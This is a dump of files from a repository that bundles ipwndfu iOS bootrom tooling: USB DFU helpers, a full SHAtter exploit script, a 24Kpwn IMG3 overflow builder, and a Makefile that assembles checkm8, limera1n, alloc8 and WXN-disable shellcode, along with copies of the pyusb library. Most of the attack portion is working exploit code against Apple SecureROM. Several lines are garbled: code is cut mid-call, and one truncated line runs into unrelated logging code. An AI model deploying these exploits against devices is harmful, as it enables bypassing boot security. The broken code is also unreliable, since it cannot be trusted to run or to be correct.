--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
8 | def acquire_device(timeout=5.0, match=None, fatal=True):
9 | backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
10 | #print 'Acquiring device handle.'
11 | # Keep retrying for up to timeout seconds if device is not found.
12 | start = time.time()
13 | once = False
14 | while not once or time.time() - start < timeout:
15 | once = True
16 | for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
17 | if match is not None and match not in device.serial_number:
18 | continue
19 | return device
20 | time.sleep(0.001)
21 | if fatal:
22 | print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
23 | sys.exit(1)
24 | return None
25 |
26 | def release_device(device):
27 | #print 'Releasing device handle.'
28 | usb.util.dispose_resources(device)
29 |
30 | def reset_counters(device):
31 | #print 'Resetting USB counters.'
32 | assert device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000) == 0
33 |
34 | def usb_reset(device):
35 | #print 'Performing USB port reset.'
36 | try:
37 | device.reset()
38 | except usb.core.USBError:
39 | # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
40 | pass
41 | #print 'Caught exception during port reset; should still work.'
42 |
43 | def send_data(device, data):
44 | #print 'Sending 0x%x of data to device.' % len(data)
45 | index = 0
46 | while index < len(data):
47 | amount = min(len(data) - index, MAX_PACKET_SIZE)
48 | assert device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000) == amount
49 | index += amount
50 |
51 | def get_data(device, amount):
52 | #print 'Getting 0x%x of data from device.' % amount
53 | data = str()
54 | while amount > 0:
55 | part = min(amount, MAX_PACKET_SIZE)
56 | ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
57 | assert len(ret) == part
58 | data += ret.tostring()
59 | amount -= part
60 | return data
61 |
62 | def request_image_validation(device):
63 | #print 'Requesting image validation.'
64 | assert device.ctrl_transfer(0x21, 1, 0, 0, '', 1000) == 0
65 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
66 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
67 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
68 | usb_reset(device)
69 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for methods calls tracing
66 | def functiontrace(logger):
67 | def decorator_logging(f):
68 | if not _enable_tracing:
69 | return f
70 | def do_trace(*args, **named_args):
71 | # this if is just a optimization to avoid unecessary string formatting
72 | if logging.DEBUG >= logger.getEffectiveLevel():
73 | _trace_function_call(logger, f.__name__, *args, **named_args)
74 | return f(*args, **named_args)
75 | _interop._update_wrapper(do_trace, f)
76 | return do_trace
77 | return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
39 | # we support Python >= 2.4
40 | assert sys.hexversion >= 0x020400f0
41 |
42 | # On Python 3, reduce became a functools module function
43 | try:
44 | import functools
45 | _reduce = functools.reduce
46 | except (ImportError, AttributeError):
47 | _reduce = reduce
48 |
49 | # all, introduced in Python 2.5
50 | try:
51 | _all = all
52 | except NameError:
53 | _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )
54 |
55 | # we only have the builtin set type since 2.5 version
56 | try:
57 | _set = set
58 | except NameError:
59 | import sets
60 | _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
64 | def _next(iter):
65 | try:
66 | return next(iter)
67 | except NameError:
68 | return iter.next()
69 |
70 | # functools appeared in 2.5
71 | try:
72 | import functools
73 | _update_wrapper = functools.update_wrapper
74 | except (ImportError, AttributeError):
75 | def _update_wrapper(wrapper, wrapped):
76 | wrapper.__name__ = wrapped.__name__
77 | wrapper.__module__ = wrapped.__module__
78 | wrapper.__doc__ = wrapped.__doc__
79 | wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
84 | def as_array(data=None):
85 | if data is None:
86 | return array.array('B')
87 |
88 | if isinstance(data, array.array):
89 | return data
90 |
91 | try:
92 | return array.array('B', data)
93 | except TypeError:
94 | # When you pass a unicode string or a character sequence,
95 | # you get a TypeError if the first parameter does not match
96 | a = array.array('B')
97 | a.fromstring(data) # deprecated since 3.2
98 | return a
99 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
32 | descriptors = {
33 | 0x1 : "Device",
34 | 0x2 : "Configuration",
35 | 0x3 : "String",
36 | 0x4 : "Interface",
37 | 0x5 : "Endpoint",
38 | 0x6 : "Device qualifier",
39 | 0x7 : "Other speed configuration",
40 | 0x8 : "Interface power",
41 | 0x9 : "OTG",
42 | 0xA : "Debug",
43 | 0xB : "Interface association",
44 | 0xC : "Security",
45 | 0xD : "Key",
46 | 0xE : "Encryption type",
47 | 0xF : "Binary device object store (BOS)",
48 | 0x10 : "Device capability",
49 | 0x11 : "Wireless endpoint companion",
50 | 0x30 : "SuperSpeed endpoint companion",
51 | }
52 |
53 | device_classes = {
54 | 0x0 : "Specified at interface",
55 | 0x2 : "Communications Device",
56 | 0x9 : "Hub",
57 | 0xF : "Personal Healthcare Device",
58 | 0xDC : "Diagnostic Device",
59 | 0xE0 : "Wireless Controller",
60 | 0xEF : "Miscellaneous",
61 | 0xFF : "Vendor-specific",
62 | }
63 |
64 | interface_classes = {
65 | 0x0 : "Reserved",
66 | 0x1 : "Audio",
67 | 0x2 : "CDC Communication",
68 | 0x3 : "Human Interface Device",
69 | 0x5 : "Physical",
70 | 0x6 : "Image",
71 | 0x7 : "Printer",
72 | 0x8 : "Mass Storage",
73 | 0x9 : "Hub",
74 | 0xA : "CDC Data",
75 | 0xB : "Smart Card",
76 | 0xD : "Content Security",
77 | 0xE : "Video",
78 | 0xF : "Personal Healthcare",
79 | 0xDC : "Diagnostic Device",
80 | 0xE0 : "Wireless Controller",
81 | 0xEF : "Miscellaneous",
82 | 0xFE : "Application Specific",
83 | 0xFF : "Vendor Specific",
84 | }
85 |
86 | ep_attributes = {
87 | 0x0 : "Control",
88 | 0x1 : "Isochronous",
89 | 0x2 : "Bulk",
90 | 0x3 : "Interrupt",
91 | }
92 |
93 | MAX_POWER_UNITS_USB2p0 = 2 # mA
94 | MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
3 | def apply_patches(binary, patches):
4 | for (offset, data) in patches:
5 | binary = binary[:offset] + data + binary[offset + len(data):]
6 | return binary
7 |
8 | def aes_decrypt(data, iv, key):
9 | if len(key) == 32:
10 | aes = 128
11 | elif len(key) == 64:
12 | aes = 256
13 | else:
14 | print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
15 | sys.exit(1)
16 |
17 | p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
18 | stdout=subprocess.PIPE,
19 | stdin=subprocess.PIPE,
20 | stderr=subprocess.PIPE)
21 | (stdout, stderr) = p.communicate(input=data)
22 |
23 | if p.returncode != 0 or len(stderr) > 0:
24 | print 'ERROR: openssl failed: %s' % stderr
25 | sys.exit(1)
26 |
27 | return stdout
28 |
29 | def hex_dump(data, address):
30 | p = subprocess.Popen(['xxd', '-o', str(address)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
31 | (stdout, stderr) = p.communicate(input=data)
32 |
33 | if p.returncode != 0 or len(stderr) > 0:
34 | print 'ERROR: xxd failed: %s' % stderr
35 | sys.exit(1)
36 |
37 | return stdout
38 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/Makefile:
--------------------------------------------------------------------------------
1 | all: armv6 armv7 arm64
2 |
3 | armv6:
4 | arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
5 | arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
6 | rm bin/steaks4uce-shellcode.o
7 |
8 | armv7:
9 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
10 | arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
11 | rm bin/limera1n-shellcode.o
12 |
13 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
14 | arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
15 | rm bin/SHAtter-shellcode.o
16 |
17 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
18 | arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
19 | rm bin/24Kpwn-shellcode.o
20 |
21 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
22 | arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
23 | rm bin/alloc8-shellcode.o
24 |
25 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
26 | arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
27 | rm bin/ibss-flash-nor-shellcode.o
28 |
29 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
30 | arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
31 | rm bin/usb_0xA1_2_armv7.o
32 |
33 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
34 | arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
35 | rm bin/checkm8_armv7.o
36 |
37 | arm64:
38 | xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
39 | gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
40 | rm bin/usb_0xA1_2_arm64.o
41 |
42 | xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
43 | gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
44 | rm bin/checkm8_arm64.o
45 |
46 | xcrun -sdk iphoneos clang src/checkm8_nopaddingcorruption_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_nopaddingcorruption_arm64.o
47 | gobjcopy -O binary -j .text bin/checkm8_nopaddingcorruption_arm64.o bin/checkm8_nopaddingcorruption_arm64.bin
48 | rm bin/checkm8_nopaddingcorruption_arm64.o
49 |
50 | xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
51 | gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
52 | rm bin/t8010_t8011_disable_wxn_arm64.o
53 |
54 | xcrun -sdk iphoneos clang src/t8015_shellcode_arm64.S -target arm64-apple-darwin -Wall -o bin/t8015_shellcode_arm64.o
55 | gobjcopy -O binary -j .text bin/t8015_shellcode_arm64.o bin/t8015_shellcode_arm64.bin
56 | rm bin/t8015_shellcode_arm64.o
57 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
6 | def generate_payload():
7 | shellcode_address = 0x8402F198 + 1
8 | data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
9 | tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
10 | header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
11 | with open('bin/SHAtter-shellcode.bin', 'rb') as f:
12 | shellcode = f.read()
13 | assert len(shellcode) <= 1024
14 | return header + tags + shellcode
15 |
16 | def exploit():
17 | print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'
18 |
19 | device = dfu.acquire_device()
20 | print 'Found:', device.serial_number
21 |
22 | if 'PWND:[' in device.serial_number:
23 | print 'Device is already in pwned DFU Mode. Not executing exploit.'
24 | return
25 |
26 | if 'CPID:8930' not in device.serial_number:
27 | print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
28 | sys.exit(1)
29 |
30 | if 'SRTG:[iBoot-574.4]' not in device.serial_number:
31 | print 'ERROR: CPID is compatible, but serial number string does not match.'
32 | print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
33 | sys.exit(1)
34 |
35 | dfu.reset_counters(device)
36 | dfu.get_data(device, 0x40)
37 | dfu.usb_reset(device)
38 | dfu.release_device(device)
39 |
40 | device = dfu.acquire_device()
41 | dfu.request_image_validation(device)
42 | dfu.release_device(device)
43 |
44 | device = dfu.acquire_device()
45 | dfu.get_data(device, 0x2C000)
46 | dfu.release_device(device)
47 |
48 | time.sleep(0.5)
49 |
50 | device = dfu.acquire_device()
51 | dfu.reset_counters(device)
52 | dfu.get_data(device, 0x140)
53 | dfu.usb_reset(device)
54 | dfu.release_device(device)
55 |
56 | device = dfu.acquire_device()
57 | dfu.request_image_validation(device)
58 | dfu.release_device(device)
59 |
60 | device = dfu.acquire_device()
61 | dfu.send_data(device, generate_payload())
62 | dfu.get_data(device, 0x2C000)
63 | dfu.release_device(device)
64 |
65 | time.sleep(0.5)
66 |
67 | device = dfu.acquire_device()
68 | failed = 'PWND:[SHAtter]' not in device.serial_number
69 | dfu.release_device(device)
70 |
71 | if failed:
72 | print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
73 | sys.exit(1)
74 |
75 | print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_nopaddingcorruption_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_nopaddingcorruption_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/t8015_shellcode_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/t8015_shellcode_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
8 | def acquire_device(timeout=5.0, match=None, fatal=True):
9 | backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
10 | #print 'Acquiring device handle.'
11 | # Keep retrying for up to timeout seconds if device is not found.
12 | start = time.time()
13 | once = False
14 | while not once or time.time() - start < timeout:
15 | once = True
16 | for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
17 | if match is not None and match not in device.serial_number:
18 | continue
19 | return device
20 | time.sleep(0.001)
21 | if fatal:
22 | print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
23 | sys.exit(1)
24 | return None
25 |
26 | def release_device(device):
27 | #print 'Releasing device handle.'
28 | usb.util.dispose_resources(device)
29 |
30 | def reset_counters(device):
31 | #print 'Resetting USB counters.'
32 | assert device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000) == 0
33 |
34 | def usb_reset(device):
35 | #print 'Performing USB port reset.'
36 | try:
37 | device.reset()
38 | except usb.core.USBError:
39 | # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
40 | pass
41 | #print 'Caught exception during port reset; should still work.'
42 |
43 | def send_data(device, data):
44 | #print 'Sending 0x%x of data to device.' % len(data)
45 | index = 0
46 | while index < len(data):
47 | amount = min(len(data) - index, MAX_PACKET_SIZE)
48 | assert device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000) == amount
49 | index += amount
50 |
51 | def get_data(device, amount):
52 | #print 'Getting 0x%x of data from device.' % amount
53 | data = str()
54 | while amount > 0:
55 | part = min(amount, MAX_PACKET_SIZE)
56 | ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
57 | assert len(ret) == part
58 | data += ret.tostring()
59 | amount -= part
60 | return data
61 |
62 | def request_image_validation(device):
63 | #print 'Requesting image validation.'
64 | assert device.ctrl_transfer(0x21, 1, 0, 0, '', 1000) == 0
65 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
66 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
67 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
68 | usb_reset(device)
69 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
